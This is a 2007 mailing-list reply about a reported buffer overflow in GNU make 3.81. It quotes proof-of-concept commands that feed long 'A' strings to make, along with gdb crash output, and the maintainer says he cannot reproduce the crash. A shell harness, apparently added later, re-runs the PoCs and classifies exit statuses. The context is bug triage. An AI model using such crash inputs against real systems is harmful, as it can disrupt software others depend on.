RE: make multiple buffer overflow

From: Dave Korn
Subject: RE: make multiple buffer overflow
Date: Thu, 6 Dec 2007 14:47:40 -0000

On 06 December 2007 05:09, laurent gaffie wrote:

> Application: Make <= 3.81
> Web Site: http://savannah.gnu.org/projects/make/ &
> http://www.gnu.org/software/make/ 
> Platform: Unix
> Bug:multiple buffer overflow

> Proof of concept example :
> make `perl -e 'print"A"x4096'` //***
> make -f `perl -e 'print"A"x4096'`
> make -j `perl -e 'print"A"x4096'`
> make -i `perl -e 'print"A"x4096'`
> make -l `perl -e 'print"A"x4096'`
> *** Depending on the case, you'll need to change the value for a couple
> more A's; playing by hundreds should be good to make sure you trigger it.

  I couldn't reproduce any of these, on either Linux or Cygwin, on 3.80 or
3.81 (although I didn't try absolutely every possible combination there).  I
get lots of "stat: AAAAAA[...]AAAA: File name too long" and "No rule to make
target `AAAAA[..]AAAA'" messages instead.

> address@hidden:~# gdb make
> GNU gdb 6.6-debian
> Copyright (C) 2006 Free Software Foundation, Inc.

  Is it possible that Debian's distro has a customised version of make?  Did
you build make from CVS sources or tarballs?  I see you've got no stack
backtrace in your debug output; if you did build your own you'd get symbol
> (gdb) run `perl -e 'print"A"x4296'` // my GCC version has protection for
> stack smashing, then 200 chars more and we trigger it

  Hmm, perhaps the stack smashing protection is generating a false positive?
I guess this implies that you /are/ building make from sources, yes?

> Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> (no debugging symbols found)
> [Thread debugging using libthread_db enabled]
> [New Thread -1209637200 (LWP 1246)]
> AAAAA.........AAAAAAAAAA....

  That's the kind of message I see from make...

> Program received signal SIGSEGV, Segmentation fault.

... but I don't get a SEGV.  Can you try it again without stack protection?

Can't think of a witty .sigline today....
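A small harness for re-running the PoC commands from the report and classifying how each run ended, so that an ordinary make error (exit status 2, the "No rule to make target" case Dave sees) can be told apart from a process killed by SIGSEGV (status 139) or by the SIGABRT that glibc's stack protector raises through __stack_chk_fail (status 134). This is an added example, not code from the thread or from GNU make; it assumes a POSIX sh with `kill -s`, perl and make on PATH, and the LEN variable is an arbitrary starting length to vary as the report suggests.

```shell
#!/bin/sh
# Added example (not from the original thread): re-run the reported make
# PoCs and classify the exit status of each run.
# Assumptions: POSIX sh, perl and make on PATH; LEN is a starting argument
# length to vary (the report suggests stepping it by a couple hundred).

LEN=${LEN:-4096}

# classify_status STATUS: print a label for a command's exit status.
# Shells report "killed by signal N" as 128+N, so 139 is SIGSEGV and
# 134 is SIGABRT (the latter is what __stack_chk_fail produces).
classify_status() {
    st=$1
    if [ "$st" -eq 0 ]; then
        echo "ok"
    elif [ "$st" -eq 139 ]; then
        echo "SIGSEGV"
    elif [ "$st" -eq 134 ]; then
        echo "SIGABRT"
    elif [ "$st" -gt 128 ]; then
        echo "signal $((st - 128))"
    else
        echo "exit $st"
    fi
}

# run_case [MAKE-OPTION...]: run make with the given options followed by a
# LEN-byte argument of 'A's, discard make's own output, print the label.
run_case() {
    arg=$(perl -e "print 'A' x $LEN")
    make "$@" "$arg" >/dev/null 2>&1
    classify_status $?
}

# run_all: the five invocations listed in the report, one line each.
run_all() {
    for opt in "" -f -j -i -l; do
        if [ -n "$opt" ]; then
            printf 'make %s <%d A> : %s\n' "$opt" "$LEN" "$(run_case "$opt")"
        else
            printf 'make <%d A>    : %s\n' "$LEN" "$(run_case)"
        fi
    done
}

# Only run the PoCs when explicitly asked, e.g.:  LEN=4296 sh harness.sh run
if [ "${1:-}" = run ]; then
    run_all
fi
```

Run it once with the distribution's make and once with a build configured without `-fstack-protector` to answer the question above: a "SIGABRT" line points at the stack protector firing, an "exit 2" line is make rejecting the target normally.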

